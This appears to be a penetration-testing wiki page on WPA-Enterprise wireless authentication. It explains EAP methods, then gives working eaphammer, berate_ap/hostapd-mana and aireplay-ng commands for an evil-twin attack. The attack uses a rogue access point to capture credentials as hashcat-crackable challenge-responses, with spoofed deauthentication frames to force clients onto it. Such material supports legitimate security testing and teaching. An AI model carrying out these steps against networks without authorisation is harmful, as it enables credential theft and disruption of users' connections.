WPA-Enterprise

WPA-Enterprise delegates the authentication to a RADIUS server. Even though it is not vulnerable to any direct attack, it is still possible to intercept credentials by performing an evil-twin attack against clients.

Theory

WPA-Enterprise, also refered to as WPA-EAP or WPA-802.1X, uses various kinds of the EAP authentication framework, which provides a transport mechanism for many other authentication methods such as:

These authentication methods allow the access point to delegate the authentication to a RADIUS server.

EAP.png

Certificate Authentication

All modern clients use EAP-TLS when needing to authenticate using a certificate. In fact, unlike most TLS implementations of HTTPS, the majority of implementations of EAP-TLS require client-side certificates without giving the option to disable this requirement.

EAP-TLS.png

Credentials Authentication

Most modern clients use PEAP or EAP-TTLS when needing to authenticate using a username and password. These protocols, similar in design, consist of two authentication layers:

PEAP_EAP-TTLS.png

Evil-Twin Attack

This attack consists of creating a rogue access point mimicking the targeted ESSID in order to get clients to perform the inner authentication process with your rogue RADIUS server. Thus, allowing you to capture the credentials or challenge-response used during inner authentication.

This attack will not work against clients configured to:

eaphammer

Warning

This tool needs to be run from its installation directory, i.e. ./eaphammer.

First, generate a fake certificate for the rogue RADIUS server:

./eaphammer --cert-wizard

Then, start the evil-twin access point with the name of the targeted ESSID:

./eaphammer -i <iface> -e <ESSID> --creds

Use the following additional options to fine-tune the evil-twin access point configuration:

Option Description
-b [00:11:22:33:44:55] Access point BSSID
--hw-mode [g/a] Hardware mode: g for 2.4 Ghz, a for 5 Ghz
-c [channel] Access point channel (list of WLAN channels)

When a client tries to authenticate to your rogue access point, eaphammer should display the captured MSCHAPv2 challenge-response in hashcat -m 5500 format. wpa-eap-eaphammer.png

In order to increase the chance of clients trying to authenticate to your rogue access point, send spoofed de-authentication frames:

aireplay-ng -0 <count> -a <BSSID> -c [client mac] <interface>
hostapd-mana

Using berate_ap and hostapd-mana, it is possible to create an evil-twin access point configured to intercept various EAP credentials:

berate_ap -n <iface> <ESSID> --eap --mana-wpe --mana-credout [/path/to/output]

This will automatically prompt you to fill-in the information required to create the rogue RADIUS certificate. Use the following additional options to fine-tune the evil-twin access point configuration:

Option Description
--mac [00:11:22:33:44:55] Access point BSSID
-c [channel] Access point channel (list of WLAN channels)
--freq-band [2.4/5] Set frequency band
--ieee80211ac Enable IEEE 802.11ac

See berate_ap -h and hostapd-mana wiki for more details.

When a client tries to authenticate to your rogue access point, hostapd-mana should display and save the captured credentials and its hashcat format in the file specified by --mana-credout.

wpa-eap-hostapd-mana.png

In order to increase the chance of clients trying to authenticate to your rogue access point, send spoofed de-authentication frames:

aireplay-ng -0 <count> -a <BSSID> -c [client mac] <interface>

References